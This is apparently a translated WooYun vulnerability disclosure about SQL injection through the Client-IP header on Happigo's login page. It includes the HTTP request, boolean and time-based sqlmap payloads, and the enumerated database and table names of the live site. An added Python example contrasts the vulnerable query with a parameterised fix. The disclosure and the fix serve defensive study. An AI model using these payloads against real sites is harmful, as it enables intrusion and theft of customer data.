Vulnerability Summary (24 followers)

Defect ID: wooyun-2015-0112041

Title: Happigo (快乐购物) main site: concealed SQL injection puts the entire site's data at risk

Vendor: 快乐购物股份有限公司 (Happigo Co., Ltd.)

Author: 紫霞仙子

Submitted: 2015-05-05 07:18

Fixed: 2015-06-19 10:04

Published: 2015-06-19 10:04

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or assistance contact [email protected]

Tags: (none)

Favorited by 4 users


Vulnerability Details

Disclosure status:

2015-05-05: Details sent to the vendor, awaiting vendor handling
2015-05-05: Vendor confirmed; details disclosed to the vendor only
2015-05-15: Details disclosed to core white hats and domain experts
2015-05-25: Details disclosed to regular white hats
2015-06-04: Details disclosed to intern white hats
2015-06-19: Details disclosed to the public

Brief description:

233

Detailed description:

User login endpoint
Parameter: the Client-IP request header (the injection point is marked with * in the request below)
GET /member/login/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Client-IP: *
X-Requested-With: XMLHttpRequest
Referer: http://www.happigo.com
Cookie: PHPSESSID=a7f7fea6f1d56066bd5283c80a7bdf59; userCartGoodsAmount=3
Host: www.happigo.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*
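The finding above is the classic proxy-header trust bug: the application reads a client-controlled header such as Client-IP as if it were the visitor's address and splices it into a query (the sqlmap output below confirms it as a custom HEADER injection point against MySQL). The following is an added example, not code from the report or from Happigo; it models that pattern in Python with SQLite so it runs offline. The table name users_login_fail is taken from the report's table listing, but its columns, rows and the rest of the schema are constructed for the demo, and the trusted-proxy logic is an assumed hardening, not the site's actual fix. The boolean-based payload is quoted verbatim from the report; the example shows it matching every row in the vulnerable query and being rejected before it reaches SQL in the hardened one.

```python
import ipaddress
import sqlite3

# Constructed demo data: a login-failure counter keyed by client IP. The table
# name comes from the report's listing; the columns and rows are assumptions.
def setup_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users_login_fail (ip TEXT NOT NULL, fails INTEGER NOT NULL)")
    conn.executemany("INSERT INTO users_login_fail VALUES (?, ?)",
                     [("10.0.0.5", 2), ("192.0.2.10", 7)])
    return conn


def naive_client_ip(headers):
    """The trusting pattern: honour client-controlled headers before the socket peer."""
    return headers.get("Client-IP") or headers.get("X-Forwarded-For") or headers["REMOTE_ADDR"]


def failed_logins_vulnerable(conn, headers):
    """Vulnerable form: the header value is concatenated straight into the WHERE clause,
    so quote characters in it rewrite the query's logic."""
    ip = naive_client_ip(headers)
    sql = "SELECT COALESCE(SUM(fails), 0) FROM users_login_fail WHERE ip = '%s'" % ip
    return conn.execute(sql).fetchone()[0]


def trusted_client_ip(headers, trusted_proxies):
    """Hardened address resolution (assumed design): only honour Client-IP when the TCP
    peer is a known reverse proxy, and reject anything that does not parse as an IP
    address before it gets anywhere near a query."""
    peer = headers["REMOTE_ADDR"]
    candidate = headers.get("Client-IP") if peer in trusted_proxies else None
    try:
        return str(ipaddress.ip_address((candidate or peer).strip()))
    except ValueError as exc:
        raise ValueError("rejected non-IP value in Client-IP header: %r" % candidate) from exc


def failed_logins_safe(conn, headers, trusted_proxies=frozenset()):
    """Hardened form: validated address plus a bound parameter; the value is data, never SQL."""
    ip = trusted_client_ip(headers, trusted_proxies)
    row = conn.execute(
        "SELECT COALESCE(SUM(fails), 0) FROM users_login_fail WHERE ip = ?", (ip,)
    ).fetchone()
    return row[0]


# The boolean-based blind payload quoted in the report's sqlmap output, verbatim.
PAYLOAD = "-1360' OR (1853=1853) AND 'tqqg'='tqqg"

if __name__ == "__main__":
    conn = setup_db()
    attack = {"REMOTE_ADDR": "203.0.113.9", "Client-IP": PAYLOAD}
    # Vulnerable: OR (1853=1853) is true for every row, so the sum covers the whole table.
    print("vulnerable:", failed_logins_vulnerable(conn, attack))
    # Hardened, no trusted proxies: the header is ignored and the peer address is used.
    print("safe, header ignored:", failed_logins_safe(conn, attack))
    # Hardened, proxy trusted: the header is consulted but fails IP validation.
    try:
        failed_logins_safe(conn, attack, trusted_proxies={"203.0.113.9"})
    except ValueError as err:
        print("safe, proxy trusted:", err)
```

Two things carry the fix: the bound parameter removes the injection regardless of what the header contains, and validating the value as an IP address (and only reading it from a trusted proxy) removes the header as an attacker-controlled input altogether. Either alone would have stopped the injection; doing both also stops the header from poisoning logs, rate limits and geo checks that key on the address.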

Proof of vulnerability:

---
Parameter: Client-IP #1* ((custom) HEADER)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: -1360' OR (1853=1853) AND 'tqqg'='tqqg
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: ' AND 8843=BENCHMARK(5000000,MD5(0x6f696d70)) AND 'knrO'='knrO
---
back-end DBMS: MySQL >= 5.0.0
database management system users [17]:
****
available databases [9]:
[*] cacti
[*] cust_admin
[*] dameiren
[*] ecmall
[*] goods_admin
[*] information_schema
[*] mysql
[*] performance_schema
[*] publish
Database: goods_admin
[335 tables]
+------------------------------------+
| HBP_album |
| HBP_brand |
| HBP_news |
| HBP_news_ext |
| HBP_notice |
| HBP_pics |
| HBP_question |
| HBP_video_album |
| HBP_videos |
| 2014_card |
| 2014_order_card_error |
| 2014_order_card |
| 723dongche |
| acti_cs |
| activity |
| activity_dt |
| acts |
| acts_comments |
| acts_comments_count |
| acts_labels |
| acts_to_goods |
| acts_to_labels |
| add_buy_list |
| address |
| address_2015 |
| address_20150105 |
| address_20150417 |
| admin_user_oplog |
| admin_users |
| advertisings |
| advertisings_imgs |
| article_list |
| article_list_ext |
| baba_category |
| baba_lunbo |
| baba_news |
| baba_qiandao |
| baba_qiandao_info |
| baba_voto |
| baba_voto_info |
| bank_pay_coupon |
| bi_all_channel_order_goods_summary |
| bi_goods_summary |
| bi_tv_online_goods_info |
| bigdeal |
| blog |
| brand_adlist |
| brand_category |
| brand_goods |
| brand_goods_detail |
| brand_goods_tag |
| bulletins |
| card |
| card_2 |
| category_attr_name |
| category_attr_value |
| category_relation |
| ccb_coupon_no |
| checkemail_conpon |
| club |
| club_message |
| club_message_replay |
| club_user |
| club_user_info |
| co_user_list |
| collect_goods |
| comment_list |
| comment_list_copy |
| comment_log |
| comment_top |
| comment_total |
| community_attend |
| community_banner |
| community_content |
| community_dynamic |
| community_keyword |
| community_point |
| community_praise_log |
| community_question |
| community_reply |
| community_topic |
| community_user |
| community_user_detail |
| community_video_comment |
| coupon_list |
| coupon_temp |
| cust_mobile_mingxi |
| cust_mobile_quan |
| czsqlog |
| detailpage_dc |
| dmr_community |
| eat_area |
| eat_goods |
| eat_task |
| ecm_article |
| ecm_consume_coupon |
| fanli_order_log |
| flash_goods |
| flash_goods_qiangshihui |
| flash_goods_score |
| flash_guoqing |
| flash_weekend_goods |
| flower_post |
| flower_thread |
| flv_data |
| flv_data2 |
| forward_coupon |
| fudai |
| goods_all_sale_total |
| goods_areacheck |
| goods_arrival |
| goods_baidu_purchase |
| goods_borghese |
| goods_brand |
| goods_brand_ext |
| goods_category |
| goods_category20140724 |
| goods_category_20120612 |
| goods_category_20150309 |
| goods_category_eyes |
| goods_category_join |
| goods_ccb |
| goods_doublebuy |
| goods_ext |
| goods_ext20141201 |
| goods_ext_copy20130705 |
| goods_has_video0305 |
| goods_import_chk |
| goods_info |
| goods_info_set |
| goods_ivr |
| goods_kc |
| goods_list |
| goods_list20140724 |
| goods_list20141130 |
| goods_list_top |
| goods_mobile_recharge |
| goods_on_off |
| goods_pic |
| goods_promotions_price |
| goods_qq |
| goods_recommend |
| goods_recommend_ext |
| goods_sail_count |
| goods_sailnum_allway |
| goods_sales |
| goods_sales_20150310 |
| goods_sales_day |
| goods_sales_day_20150310 |
| goods_score_buy |
| goods_score_buy_copy |
| goods_shielding |
| goods_showhost |
| goods_sku |
| goods_spec |
| goods_spec20141201 |
| goods_spec2014120102 |
| goods_stat |
| goods_stock |
| goods_tmall |
| goods_tv |
| goods_tv_1 |
| goods_tv_copy |
| goods_week_sale_total |
| goods_yestoday_sale_total |
| happi_tuan |
| happi_tuan_app |
| happi_tuan_brand |
| happynewuser |
| hdep_info |
| hn_activity |
| hn_comment |
| hn_goods |
| hn_merchant |
| hn_recommend |
| hn_share |
| hotsale_ad |
| hotsale_list_copy |
| huodong_log |
| hwm_stock |
| hwm_stock_new |
| hwm_stock_temp20131121 |
| icbc_qiang |
| index_adv |
| index_baokuan |
| index_groupbuy |
| index_miaosha |
| installment_index |
| installment_info |
| iphone4_mobile |
| jfhk |
| jfhk0517 |
| jfhk_copy |
| jianhang_ka |
| jifen_goods |
| jifen_logistics |
| jifen_orders |
| jifen_questionnaire |
| jifen_recommend |
| jifenmiaosha |
| jinxi |
| lifecircle_activity |
| lifecircle_message |
| lifecircle_message_replay |
| lifecircle_topic |
| lifecircle_users |
| love_donation |
| menu |
| menu_role |
| merchant |
| merchant_ext |
| merchant_users |
| mobile_home_discount |
| netpay_info |
| new_article_list |
| new_article_list_ext |
| numerical_mobile_goods |
| numerical_mobile_keywords |
| numerical_mobile_lunbo |
| order_815 |
| order_addr |
| order_card |
| order_card_error |
| order_discount |
| order_discount20141201 |
| order_gifts |
| order_goods |
| order_goods2010 |
| order_goods20141211 |
| order_huanzhugege |
| order_invoice |
| order_invoice_dz |
| order_iphone4 |
| order_iphone4_copy1 |
| order_iphone4_copy3 |
| order_iphone4_copy_2 |
| order_jianhang |
| order_jianhang_ka |
| order_jifenbuycard |
| order_jifenbuycard_copy |
| order_miaosha |
| order_miaosha_copy |
| order_miaosha_copy1 |
| order_miaosha_copy2 |
| order_miaosha_copy3 |
| order_mobile_recharge |
| order_mobile_recharge20141016 |
| order_mobile_recharge_qr |
| order_no_seq |
| order_opinion |
| order_pre |
| order_qianggouipad |
| order_save_hwm_log |
| order_wuliangye |
| orders |
| orders20141201 |
| orders_pro |
| orders_pro20141201 |
| pay_points |
| pgm |
| pgm_article |
| pgm_cfs |
| pgm_eyes |
| pgm_goods |
| reply_list |
| role |
| sale_record |
| sale_top_day |
| sale_top_day_1125 |
| sale_top_day_temp |
| sale_top_day_temp1 |
| sale_top_month |
| sale_top_week |
| score_list |
| score_total |
| score_total_temp |
| sec_kill_list |
| send_mail |
| send_mes |
| shopping_cart |
| shopping_cart20131212 |
| shopping_cart_user |
| shopping_cart_user20131212 |
| showhost |
| sphinx_goods_counter |
| store |
| sunorder |
| sunorder_img |
| sunorder_jl |
| synchronize_order |
| synchronize_order_goods |
| talk_attachment |
| talk_forum |
| talk_thread |
| talk_threadtag |
| tb_orders_to_hrp |
| tb_val_to_val |
| temp_shiyong_mingdan |
| try_apply |
| try_goods |
| try_goods_pic |
| try_img |
| try_report |
| tvinfo |
| user_coupon |
| user_gift_coupon |
| user_givequan |
| user_head |
| user_invite |
| user_message |
| user_noreg |
| user_quiz |
| user_quiz_copy |
| user_sandai |
| user_save_code |
| user_save_help |
| user_service |
| user_subscribe |
| user_suggests |
| user_survey |
| users_list |
| users_list20141201 |
| users_list_4 |
| users_login_fail |
| users_login_fail20141202 |
| wahaha_code |
| wahaha_user |
| will_buy |
| will_buy_detail |
| will_buy_opt |
| wish_goods |
| wx_tuijian_info |
| xunbao |
| xunbao_message |
| yundan_comment |
+------------------------------------+
And there are many more databases...

Fix recommendation:

~~ The data impact is too great; fix it urgently.
Requesting 20 Rank.

Copyright notice: when reposting, credit the source: 紫霞仙子@乌云


Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2015-05-05 10:03

Vendor reply:

Thank you, 路人甲, for supporting Happigo's information security!

Latest status:

None yet